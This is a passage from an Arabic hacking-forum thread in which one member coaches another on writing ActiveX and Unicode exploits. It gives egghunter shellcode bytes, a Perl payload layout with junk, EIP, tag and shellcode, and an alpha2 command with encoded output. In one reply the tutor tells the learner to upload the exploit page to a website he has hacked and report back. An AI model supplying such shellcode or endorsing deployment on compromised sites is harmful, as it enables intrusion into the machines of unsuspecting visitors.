شرح استغلال ثغرات Activex وكتابة استغلال Unicode - الصفحة 3 - الحماية للأبد

MadjiX · #21 31-07-2010, 12:45 AM

لا عادي اخي

بالنسبة لسؤالك الثاني الثغرات تشتغل عادي اخي اذا رفعتها

او حطيتها بسيرفر اباتشي وخليت اي شخص يتصل بالرابط رح تشتغل

اما بالنسبة للمفتاح شايف ها*ي ببداية الشل كود %u7a44㜲穄㜲% ؟

طيب روح فكها من لهيكس الي حروف تلقى الناتج 27Dz

الحين شغلة ال egg hunter بالأسفل انو رح يبحث عن 27Dz لما يلقا هاذي الكلمة

رح يشغل الشل كود تمام طبعا انا هون فالثغرة غيرت المفتاح من w00t

المهم تحط اي كلمة يبحث عنها ال egg لما يلقاها يشغل الشل كود بعدها

بالنسبة لمشكلة ecx واله ماعرفت كيف رح ابسط لك اكثر من فوق اقرا كم مرة

ورح تفهم اي سؤال اخر انا هنا ان شاء الله

overflow3r · #22 31-07-2010, 12:54 AM

أنا جربت أرفعها على سيرفير محلي و لم تشتغل
هل جربتها أنت؟

أه فهمت مبدأ ال egghunter يعني لما يجد 27DZ يعني أنه وجد الشل كود
لكن الegghunter بنسفه لاحظت فيه المفتاح 27DZ و إذا كان سيبحث في كامل الذاكرة فأكيد سيفحص نفسه
فكيف سيعرف إذا ما كان هو الشل كود أما لا يزال في egghunter?

بالنسبة لمشكلة ecx سأحاول أن أطلع أكثر
ممكن ترفق لنا الملف المصاب لكي نجرب؟

MadjiX · #23 31-07-2010, 01:02 AM

أنت ذكي وتعجبني أسئلتك
الـ egghunter فيه 27dz
واحد فقط اما بداية الشل كود فاثنان يعني
27Dz27Dz
عندما يتكرر يعرف بانه فالمكان الصحيح
اما بالنسبة
لل سيرفر والثغرة فتشتغل شف موقع انت مخترقه
وارفع عليه لصفحة وردلي بالخبر
وانا ارفقت كل شيء استعملته فالشرح
في ها*ا الرد

اقتباس:

المشاركة الأصلية كتبت بواسطة MadjiX

البرنامج المصاب فيجوال بيسك
بصح تقدر تفحص الملف dll المصاب مايحتاجش كل البرنامج
الملف المصاب رفعتو ليك هنا
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
اما ابرنامج لي كنت نفحص بيه
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]
أما البرنامج نتاع التنقيح i
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

اما الريموت ديسكتوب نتاعك لي عطيتهولي :D
هاذا اسمو vmware

MadjiX · #24 31-07-2010, 01:19 AM

ببساطة اكثر ا*ا مافهمت
ال egg hunter رح يبحث عن w00tw00t مش w00t
لها*ا بنحطها مكررة قبل الشل كود اما فال egg تكون واحدة بس
شف هون ها*ا مثال عن egg

كود:

my $egghunter ="\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t"
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

اما الاستغلال رح يكون

كود:

my $payload=$junk.$eip.$egghunter.$padding."w00tw00t".$shellcode;

كمثال

والله الخطا مني لاني كاتب بالرد يبحث عن 27Dz
كنت شرحت كل شيء من الاول كان افضل انا والله من الاول حطيت الدرس
لمستوى متقدم بس معلش نحن فالخدمة ^^

overflow3r · #25 01-08-2010, 03:15 PM

بارك الله فيك
هل ممكن تقول لنا كيفية تصنع egghunter unicode?

MadjiX · #26 01-08-2010, 05:01 PM

عادي اخي تجيب egg hunter
وتعمله ب alpha2 encode
رح ينتجلك egg hunter unicode

overflow3r · #27 01-08-2010, 05:09 PM

إذا ممكن أخي تعمل شرح كتابي بسيط في الرد حول الطريقة لأني لم أعرف كيف أبدأ

MadjiX · #28 01-08-2010, 05:26 PM

طيب انا ارفقتلك اداة alpha في الرد اعملها compile
وروح لمكانها وحط هاذا الامر

كود:

./alpha eax --unicode --uppercase < /home/madjix/Desktop/overflower.bin

وطبعا من دون ماشرح حط ال egg في ها* الملف overfow3r.bin وها*ي عملتها الحين بس للشرح

كود:

madjix@Dz:~/Desktop$ vim Test.bin 
MadjiX-*/"'àçOverflow3r
madjix@Dz:~/Desktop$ ./alpha eax --unicode --uppercase < /home/madjix/Desktop/Test.bin
PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIA
QAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAI
QI1111AIAJQI1AYAZBABABABAB30APB944JBPMQQ342JS9P
XNMNJNOMRMWXCEPXCVG0ORVC5BR36RL2OD7OCRRLJA

vim لقراءة مايوجد ب Test.bin
والامر الثاني لعمل ال encode alpha

أي سؤال اخر لا تردد مارح اتركك حتى نشوف اسمك في exploit-db :D

overflow3r · #29 01-08-2010, 05:53 PM

لا أدري ماذا أقول لك الله يجازيك خيرا على هذا الرد

ينقص فيه شيء واحد أظن و هو egg يا ريت ترفقه

MadjiX · #30 01-08-2010, 05:58 PM

ال egg في كثير تقدر تجيبهم من اي مكان وتعملهم encode
يصيرو unicode بس اذا عملتلك انا egg رح يكون eax او ecx
يعني رح عمله على اي محرر لهاذا خليتك انت الي تعمله لانو يختف
من ثغرة الى اخرى اختلاف في المحرر انت شوفت الامر انا حطيت eax
للتجربة بس انت في ثغرتك رح يختلف

أنت اعمل بهاذا
ينفع

كود:

my $egghunter ="\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t"
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

أدوات الموضوع
مشاهدة صفحة طباعة الموضوع أرسل هذا الموضوع إلى صديق
انواع عرض الموضوع
العرض العادي الانتقال إلى العرض المتطور الانتقال إلى العرض الشجري

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
شرح فحص وكتابة استغلال Stack Buffer Overflow شــامل	MadjiX	المواضيع المميزة	31	06-09-2010 11:48 PM
فيديو يشرح استغلال ثغرة في متصفحات ie6 ,7 & 8 بالميتاسبلوات	Sec4ever	أساسيات حماية المواقع والسيرفرات - Bases of Protection sites and servers	4	27-07-2010 08:17 PM
سكريبت من اجل التعلم على استغلال الثغرات و تجريب الأستغلال	Sec4ever	أساسيات حماية المواقع والسيرفرات - Bases of Protection sites and servers	11	14-07-2010 03:25 PM
فيديو شرح استغلال ثغرة توقف Windows 7	Sec4ever	أساسيات حماية المواقع والسيرفرات - Bases of Protection sites and servers	5	07-06-2010 12:08 AM
كتاب اتقان استعمال ال xml مع ال php	Sec4ever	:: قسم الكتب الألكترونية E-books ::	4	04-02-2010 12:40 PM

حماية المواقع	اختراق المواقع	حماية الأجهزة	اختراق الأجهزة	الحماية للأبد
تشفير و فك تشفير	المواقع بنفس الدورك	مسار لوحة الأدمن	مواقع على نفس الIP	الحماية للأبد
حماية السكريبتات	اختراق السكريبتات	اكتشاف الثغرات	ترقيع الثغرات	الحماية للأبد
الحماية للأبد	الحماية للأبد	الحماية للأبد	الحماية للأبد	الحماية للأبد
الحماية للأبد	الحماية للأبد	سكيوورتى وور	باك تراك العرب	طلبة الجزائر

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)